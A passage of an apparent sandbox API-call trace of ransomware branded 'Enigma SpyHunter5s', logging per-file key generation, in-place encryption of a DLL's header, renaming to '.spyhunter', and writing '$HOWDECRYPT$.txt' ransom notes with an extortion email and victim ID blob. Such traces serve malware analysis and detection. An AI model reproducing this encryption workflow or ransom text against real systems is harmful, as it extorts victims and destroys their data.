pbData=0x31f098*, pdwDataLen=0x270fb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb18*=0x30) returned 1 [0092.491] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.499] GetProcessHeap () returned 0x2c0000 [0092.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.499] GetProcessHeap () returned 0x2c0000 [0092.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0092.499] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb18 | out: pbBuffer=0x270fb18) returned 1 [0092.499] GetProcessHeap () returned 0x2c0000 [0092.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.499] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb10*=0x30) returned 1 [0092.499] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.500] GetProcessHeap () returned 0x2c0000 [0092.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.500] GetProcessHeap () returned 0x2c0000 [0092.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f328 | out: hHeap=0x2c0000) returned 1 [0092.500] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb18 | out: pbBuffer=0x270fb18) returned 1 [0092.500] GetProcessHeap () returned 0x2c0000 [0092.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0092.500] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270fb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270fb10*=0x30) returned 1 [0092.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.500] GetProcessHeap () returned 0x2c0000 [0092.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0092.500] GetProcessHeap () returned 0x2c0000 [0092.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f508 | out: hHeap=0x2c0000) returned 1 [0092.500] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0092.513] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.513] WriteFile (in: hFile=0xcc, lpBuffer=0x270fa47*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fb70, lpOverlapped=0x0 | out: lpBuffer=0x270fa47*, lpNumberOfBytesWritten=0x270fb70*=0x127, lpOverlapped=0x0) returned 1 [0092.514] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.514] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fb70*=0x2ac, lpOverlapped=0x0) returned 1 [0092.514] CloseHandle (hObject=0xcc) returned 1 [0092.515] GetProcessHeap () returned 0x2c0000 [0092.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377ff0 | out: hHeap=0x2c0000) returned 1 [0092.515] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb10 | out: pbBuffer=0x270fb10) returned 1 [0092.515] GetProcessHeap () returned 0x2c0000 [0092.515] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.515] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fb08*=0x30) returned 1 [0092.515] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.516] GetProcessHeap () returned 0x2c0000 [0092.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.516] GetProcessHeap () returned 0x2c0000 [0092.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381988 | out: hHeap=0x2c0000) returned 1 [0092.516] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb08 | out: pbBuffer=0x270fb08) returned 1 [0092.516] GetProcessHeap () returned 0x2c0000 [0092.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.516] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fb00*=0x30) returned 1 [0092.516] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.520] GetProcessHeap () returned 0x2c0000 [0092.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.520] GetProcessHeap () returned 0x2c0000 [0092.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3555a0 | out: hHeap=0x2c0000) returned 1 [0092.520] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb08 | out: pbBuffer=0x270fb08) returned 1 [0092.520] GetProcessHeap () returned 0x2c0000 [0092.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.520] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fb00*=0x30) returned 1 [0092.520] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.522] GetProcessHeap () returned 0x2c0000 [0092.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.522] GetProcessHeap () returned 0x2c0000 [0092.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381880 | out: hHeap=0x2c0000) returned 1 [0092.522] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb00 | out: pbBuffer=0x270fb00) returned 1 [0092.522] GetProcessHeap () returned 0x2c0000 [0092.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.523] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270faf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270faf8*=0x30) returned 1 [0092.523] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.527] GetProcessHeap () returned 0x2c0000 [0092.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.527] GetProcessHeap () returned 0x2c0000 [0092.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a160 | out: hHeap=0x2c0000) returned 1 [0092.528] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fb00 | out: pbBuffer=0x270fb00) returned 1 [0092.528] GetProcessHeap () returned 0x2c0000 [0092.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.528] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270faf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270faf8*=0x30) returned 1 [0092.528] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0092.547] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll") returned 84 [0092.547] StrStrW (lpFirst="VSTOMessageProvider.dll", lpSrch=".txt") returned 0x0 [0092.547] GetProcessHeap () returned 0x2c0000 [0092.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0092.547] ReadFile (in: hFile=0x174, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fabc, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x270fabc*=0x2800, lpOverlapped=0x0) returned 1 [0092.568] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.568] WriteFile (in: hFile=0x174, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fabc, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x270fabc*=0x2800, lpOverlapped=0x0) returned 1 [0092.569] GetProcessHeap () returned 0x2c0000 [0092.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0092.569] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.569] WriteFile (in: hFile=0x174, lpBuffer=0x270fafc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fabc, lpOverlapped=0x0 | out: lpBuffer=0x270fafc*, lpNumberOfBytesWritten=0x270fabc*=0x4, lpOverlapped=0x0) returned 1 [0092.591] WriteFile (in: hFile=0x174, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fabc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270fabc*=0x30, lpOverlapped=0x0) returned 1 [0092.591] CloseHandle (hObject=0x174) returned 1 [0092.592] GetProcessHeap () returned 0x2c0000 [0092.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c21098 [0092.592] wnsprintfW (in: pszDest=0x2c21098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll.spyhunter") returned 94 [0092.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOMessageProvider.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstomessageprovider.dll.spyhunter")) returned 1 [0092.593] GetProcessHeap () returned 0x2c0000 [0092.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0092.593] GetProcessHeap () returned 0x2c0000 [0092.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.593] GetProcessHeap () returned 0x2c0000 [0092.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3554a8 | out: hHeap=0x2c0000) returned 1 [0092.593] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270faf8 | out: pbBuffer=0x270faf8) returned 1 [0092.593] GetProcessHeap () returned 0x2c0000 [0092.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.593] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270faf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270faf0*=0x30) returned 1 [0092.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.595] GetProcessHeap () returned 0x2c0000 [0092.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.595] GetProcessHeap () returned 0x2c0000 [0092.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381ca0 | out: hHeap=0x2c0000) returned 1 [0092.595] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270faf8 | out: pbBuffer=0x270faf8) returned 1 [0092.595] GetProcessHeap () returned 0x2c0000 [0092.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.595] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270faf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270faf0*=0x30) returned 1 [0092.595] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.596] GetProcessHeap () returned 0x2c0000 [0092.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.596] GetProcessHeap () returned 0x2c0000 [0092.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x375928 | out: hHeap=0x2c0000) returned 1 [0092.596] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270faf0 | out: pbBuffer=0x270faf0) returned 1 [0092.596] GetProcessHeap () returned 0x2c0000 [0092.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.597] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fae8*=0x30) returned 1 [0092.597] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.597] GetProcessHeap () returned 0x2c0000 [0092.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.597] GetProcessHeap () returned 0x2c0000 [0092.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381b98 | out: hHeap=0x2c0000) returned 1 [0092.597] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270faf0 | out: pbBuffer=0x270faf0) returned 1 [0092.597] GetProcessHeap () returned 0x2c0000 [0092.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.598] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fae8*=0x30) returned 1 [0092.598] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\layers.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.598] GetProcessHeap () returned 0x2c0000 [0092.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.598] GetProcessHeap () returned 0x2c0000 [0092.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346f08 | out: hHeap=0x2c0000) returned 1 [0092.598] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fae8 | out: pbBuffer=0x270fae8) returned 1 [0092.598] GetProcessHeap () returned 0x2c0000 [0092.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.598] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fae0*=0x30) returned 1 [0092.598] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.598] GetProcessHeap () returned 0x2c0000 [0092.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.598] GetProcessHeap () returned 0x2c0000 [0092.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3782a8 | out: hHeap=0x2c0000) returned 1 [0092.598] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fae8 | out: pbBuffer=0x270fae8) returned 1 [0092.598] GetProcessHeap () returned 0x2c0000 [0092.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.599] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fae0*=0x30) returned 1 [0092.599] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.599] GetProcessHeap () returned 0x2c0000 [0092.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.599] GetProcessHeap () returned 0x2c0000 [0092.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f508 | out: hHeap=0x2c0000) returned 1 [0092.599] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fae0 | out: pbBuffer=0x270fae0) returned 1 [0092.599] GetProcessHeap () returned 0x2c0000 [0092.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0092.600] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270fad8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270fad8*=0x30) returned 1 [0092.600] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.600] GetProcessHeap () returned 0x2c0000 [0092.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0092.600] GetProcessHeap () returned 0x2c0000 [0092.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3781c0 | out: hHeap=0x2c0000) returned 1 [0092.600] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0092.602] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.602] WriteFile (in: hFile=0x174, lpBuffer=0x270fa13*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fb3c, lpOverlapped=0x0 | out: lpBuffer=0x270fa13*, lpNumberOfBytesWritten=0x270fb3c*=0x127, lpOverlapped=0x0) returned 1 [0092.603] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.603] WriteFile (in: hFile=0x174, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fb3c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fb3c*=0x2ac, lpOverlapped=0x0) returned 1 [0092.603] CloseHandle (hObject=0x174) returned 1 [0092.604] GetProcessHeap () returned 0x2c0000 [0092.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346e28 | out: hHeap=0x2c0000) returned 1 [0092.604] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fad8 | out: pbBuffer=0x270fad8) returned 1 [0092.604] GetProcessHeap () returned 0x2c0000 [0092.604] 